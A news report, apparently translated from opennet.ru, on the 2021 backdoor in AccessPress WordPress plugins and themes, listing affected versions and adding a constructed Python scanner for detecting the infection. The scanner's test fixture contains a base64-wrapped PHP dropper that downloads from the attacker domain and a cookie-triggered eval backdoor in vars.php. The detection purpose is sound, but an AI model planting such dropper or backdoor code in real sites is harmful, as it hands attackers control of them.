Backdoor in 93 AccessPress plugins and themes used on 360 thousand sites

Attackers managed to plant a backdoor in 53 plugins and 40 themes for the WordPress content management system developed by AccessPress, which claims its add-ons are in use on more than 360 thousand sites. The results of the incident analysis have not been published, but the malicious code is believed to have been introduced during a compromise of the AccessPress website, by modifying the files offered for download of already-released versions: the backdoor was present only in the distributions served from the official AccessPress site, and was absent from the same versions of the add-ons distributed through the WordPress.org directory.

The malicious changes were discovered by a researcher at Jetpack (a division of WordPress developer Automattic) while examining malicious code found on a customer's website. Analysis of the situation showed that the malicious changes were present in a WordPress add-on downloaded from the official AccessPress website. Other add-ons from the same company contained similar malicious changes granting full access to the site with administrator rights.

During the compromise, the attackers added an "initial.php" file to the theme and plugin directories and hooked it in with an "include" directive in the "functions.php" file. To cover their tracks, the malicious payload inside "initial.php" was stored as a base64-encoded block of data. Under the guise of fetching an image from the site wp-theme-connect.com, the malicious payload wrote the backdoor code directly into the file wp-includes/vars.php.
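As an added example, not code from the original article or from AccessPress, Jetpack or Sucuri: a Python scanner that checks a WordPress tree for the three artefacts described above (a rogue initial.php in theme or plugin directories, an include of it from functions.php, and a tampered wp-includes/vars.php), decoding long base64 runs so that indicators hidden inside the encoded block are still caught. The only indicator taken from the report is the wp-theme-connect.com domain; the comparison against a pristine vars.php hash, the directory layout, and the sample files the script builds in a temporary directory are constructed assumptions for illustration.

```python
"""Constructed detection example for the AccessPress-style infection chain:
rogue initial.php in theme/plugin directories, an include of it from
functions.php, and a base64-wrapped dropper that alters wp-includes/vars.php.
Not code from AccessPress, Jetpack or Sucuri."""
import base64
import binascii
import hashlib
import re
import tempfile
from pathlib import Path

# The only indicator taken from the incident report is this domain.
KNOWN_C2_DOMAINS = ("wp-theme-connect.com",)
# Generic tells of injected PHP: runtime code loading and decoders.
SUSPECT_PHP = re.compile(r"\b(eval|base64_decode|gzinflate|str_rot13|assert)\s*\(")
INCLUDE_INITIAL = re.compile(r"\b(include|include_once|require|require_once)\b[^;]*initial\.php")
LONG_B64 = re.compile(r"[A-Za-z0-9+/]{200,}={0,2}")


def sha256_of(path: Path) -> str:
    return hashlib.sha256(path.read_bytes()).hexdigest()


def decoded_blobs(text: str):
    """Yield the plaintext of every long base64 run that decodes cleanly."""
    for m in LONG_B64.finditer(text):
        try:
            yield base64.b64decode(m.group(0), validate=True).decode("latin-1")
        except (binascii.Error, ValueError):
            continue


def scan(root: Path, pristine_vars_sha256: str) -> list[tuple[str, str]]:
    """Return (reason, path relative to root) findings. pristine_vars_sha256 is
    the hash of wp-includes/vars.php from a clean tarball of the same WordPress
    release (assumed to be available to the operator)."""
    findings = []
    for area in ("themes", "plugins"):
        base = root / "wp-content" / area
        for pkg in (sorted(base.iterdir()) if base.is_dir() else []):
            initial, functions = pkg / "initial.php", pkg / "functions.php"
            if initial.is_file():
                rel = str(initial.relative_to(root))
                text = initial.read_text(errors="replace")
                findings.append(("rogue initial.php", rel))
                # Look at the file itself and at every decoded base64 layer.
                layers = [text, *decoded_blobs(text)]
                if len(layers) > 1 and any(SUSPECT_PHP.search(l) for l in layers):
                    findings.append(("base64-wrapped code", rel))
                for dom in KNOWN_C2_DOMAINS:
                    if any(dom in l for l in layers):
                        findings.append((f"references {dom}", rel))
            if functions.is_file() and INCLUDE_INITIAL.search(functions.read_text(errors="replace")):
                findings.append(("functions.php includes initial.php", str(functions.relative_to(root))))
    vars_php = root / "wp-includes" / "vars.php"
    if vars_php.is_file() and sha256_of(vars_php) != pristine_vars_sha256:
        findings.append(("vars.php differs from pristine core", "wp-includes/vars.php"))
        if SUSPECT_PHP.search(vars_php.read_text(errors="replace")):
            findings.append(("vars.php contains eval/decoder", "wp-includes/vars.php"))
    return findings


# Constructed stand-in for WordPress core vars.php (not the real file).
CLEAN_VARS = "<?php\n// constructed stand-in for WordPress core vars.php\n$is_apache = true;\n"


def build_fixture(root: Path, infected: bool) -> str:
    """Lay out a minimal constructed WordPress tree; return the pristine vars.php hash."""
    theme = root / "wp-content" / "themes" / "sample-theme"
    plugin = root / "wp-content" / "plugins" / "sample-plugin"
    for d in (root / "wp-includes", theme, plugin):
        d.mkdir(parents=True)
    (root / "wp-includes" / "vars.php").write_text(CLEAN_VARS)
    pristine = sha256_of(root / "wp-includes" / "vars.php")
    (theme / "functions.php").write_text("<?php\nadd_theme_support('title-tag');\n")
    (plugin / "sample-plugin.php").write_text("<?php\n/* Plugin Name: Sample */\n")
    if infected:
        # Constructed dropper: pretends to fetch an image, then appends to vars.php.
        dropper = ("$img = wp_remote_get('http://wp-theme-connect.com/img.jpg');\n"
                   "file_put_contents(ABSPATH . 'wp-includes/vars.php', "
                   "wp_remote_retrieve_body($img), FILE_APPEND);\n").ljust(240)
        blob = base64.b64encode(dropper.encode()).decode()
        payload = f"<?php\neval(base64_decode('{blob}'));\n"
        (theme / "initial.php").write_text(payload)
        (plugin / "initial.php").write_text(payload)
        (theme / "functions.php").write_text(
            "<?php\ninclude_once(dirname(__FILE__) . '/initial.php');\n"
            "add_theme_support('title-tag');\n")
        (root / "wp-includes" / "vars.php").write_text(
            CLEAN_VARS + "if (isset($_COOKIE['k'])) { eval(base64_decode($_COOKIE['k'])); }\n")
    return pristine


def demo() -> dict[str, list[tuple[str, str]]]:
    """Scan a clean and an infected constructed tree; return both finding lists."""
    out = {}
    for label in ("clean", "infected"):
        with tempfile.TemporaryDirectory() as tmp:
            root = Path(tmp)
            out[label] = scan(root, build_fixture(root, infected=(label == "infected")))
    return out


if __name__ == "__main__":
    for label, found in demo().items():
        print(f"{label}: {len(found)} finding(s)")
        for reason, path in found:
            print(f"  {reason}: {path}")
```

On a real install, point scan() at the WordPress root and pass the sha256 of vars.php taken from the matching release tarball; a hash mismatch is the decisive signal, the grep heuristics only explain what changed. Decoding base64 runs matters because the domain and the write to vars.php are not visible in the outer file at all.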


The first sites containing the malicious changes to AccessPress add-ons were identified in September 2021; the backdoor is presumed to have been inserted into the add-ons at around that time. The initial notification to AccessPress about the problem went unanswered, and AccessPress could only be reached after the WordPress.org team was brought into the investigation. On October 15, 2021, the files affected by the backdoor were removed from the AccessPress website, and new releases of the add-ons were published on January 17, 2022.

Sucuri examined various sites on which AccessPress releases were installed and found malicious payloads installed through the backdoor that sent out spam and redirected visitors to fraudulent sites (the modules had been written in 2019 and 2020). The backdoor's authors are presumed to have sold access to the compromised sites.

Themes in which the backdoor was found:

  • accessbuddy 1.0.0
  • accesspress-basic 3.2.1
  • accesspress-lite 2.92
  • accesspress-mag 2.6.5
  • accesspress-parallax 4.5
  • accesspress-ray 1.19.5
  • accesspress-root 2.5
  • accesspress-staple 1.9.1
  • accesspress-store 2.4.9
  • agency-lite 1.1.6
  • aplite 1.0.6
  • bingle 1.0.4
  • bloger 1.2.6
  • construction-lite 1.2.5
  • doko 1.0.27
  • enlighten 1.3.5
  • fashstore 1.2.1
  • fotography 2.4.0
  • gaga-corp 1.0.8
  • gaga-lite 1.4.2
  • one-paze 2.2.8
  • parallax-blog 3.1.1574941215
  • parallaxsome 1.3.6
  • punte 1.1.2
  • revolve 1.3.1
  • ripple 1.2.0
  • scrollme 2.1.0
  • sportsmag 1.2.1
  • storevilla 1.4.1
  • swing-lite 1.1.9
  • the-launcher 1.3.2
  • the-monday 1.4.1
  • uncode-lite 1.3.1
  • unicon-lite 1.2.6
  • vmag 1.2.7
  • vmagazine-lite 1.3.5
  • vmagazine-news 1.0.5
  • zigcy-baby 1.0.6
  • zigcy-cosmetics 1.0.5
  • zigcy-lite 2.0.9

Plugins in which the backdoor was found (backdoored version, followed by the fixed version where one was released):

  • accesspress-anonymous-post 2.8.0 (fixed in 2.8.1)
  • accesspress-custom-css 2.0.1 (fixed in 2.0.2)
  • accesspress-custom-post-type 1.0.8 (fixed in 1.0.9)
  • accesspress-facebook-auto-post 2.1.3 (fixed in 2.1.4)
  • accesspress-instagram-feed 4.0.3 (fixed in 4.0.4)
  • accesspress-pinterest 3.3.3 (fixed in 3.3.4)
  • accesspress-social-counter 1.9.1 (fixed in 1.9.2)
  • accesspress-social-icons 1.8.2 (fixed in 1.8.3)
  • accesspress-social-login-lite 3.4.7 (fixed in 3.4.8)
  • accesspress-social-share 4.5.5 (fixed in 4.5.6)
  • accesspress-twitter-auto-post 1.4.5 (fixed in 1.4.6)
  • accesspress-twitter-feed 1.6.7 (fixed in 1.6.8)
  • ak-menu-icons-lite 1.0.9
  • ap-companion 1.0.7
  • ap-contact-form 1.0.6 (fixed in 1.0.7)
  • ap-custom-testimonial 1.4.6 (fixed in 1.4.7)
  • ap-mega-menu 3.0.5 (fixed in 3.0.6)
  • ap-pricing-tables-lite 1.1.2 (fixed in 1.1.3)
  • apex-notification-bar-lite 2.0.4 (fixed in 2.0.5)
  • cf7-store-to-db-lite 1.0.9 (fixed in 1.1.0)
  • comments-disable-accesspress 1.0.7 (fixed in 1.0.8)
  • easy-side-tab-cta 1.0.7 (fixed in 1.0.8)
  • everest-admin-theme-lite 1.0.7 (fixed in 1.0.8)
  • everest-coming-soon-lite 1.1.0 (fixed in 1.1.1)
  • everest-comment-rating-lite 2.0.4 (fixed in 2.0.5)
  • everest-counter-lite 2.0.7 (fixed in 2.0.8)
  • everest-faq-manager-lite 1.0.8 (fixed in 1.0.9)
  • everest-gallery-lite 1.0.8 (fixed in 1.0.9)
  • everest-google-places-reviews-lite 1.0.9 (fixed in 2.0.0)
  • everest-review-lite 1.0.7
  • everest-tab-lite 2.0.3 (fixed in 2.0.4)
  • everest-timeline-lite 1.1.1 (fixed in 1.1.2)
  • inline-call-to-action-builder-lite 1.1.0 (fixed in 1.1.1)
  • product-slider-for-woocommerce-lite 1.1.5 (fixed in 1.1.6)
  • smart-logo-showcase-lite 1.1.7 (fixed in 1.1.8)
  • smart-scroll-posts 2.0.8 (fixed in 2.0.9)
  • smart-scroll-to-top-lite 1.0.3 (fixed in 1.0.4)
  • total-gdpr-compliance-lite 1.0.4
  • total-team-lite 1.1.1 (fixed in 1.1.2)
  • ultimate-author-box-lite 1.1.2 (fixed in 1.1.3)
  • ultimate-form-builder-lite 1.5.0 (fixed in 1.5.1)
  • woo-badge-designer-lite 1.1.0 (fixed in 1.1.1)
  • wp-1-slider 1.2.9 (fixed in 1.3.0)
  • wp-blog-manager-lite 1.1.0 (fixed in 1.1.2)
  • wp-comment-designer-lite 2.0.3 (fixed in 2.0.4)
  • wp-cookie-user-info 1.0.7 (fixed in 1.0.8)
  • wp-facebook-review-showcase-lite 1.0.9
  • wp-fb-messenger-button-lite 2.0.7
  • wp-floating-menu 1.4.4 (fixed in 1.4.5)
  • wp-media-manager-lite 1.1.2 (fixed in 1.1.3)
  • wp-popup-banners 1.2.3 (fixed in 1.2.4)
  • wp-popup-lite 1.0.8
  • wp-product-gallery-lite 1.1.1

Source: opennet.ru
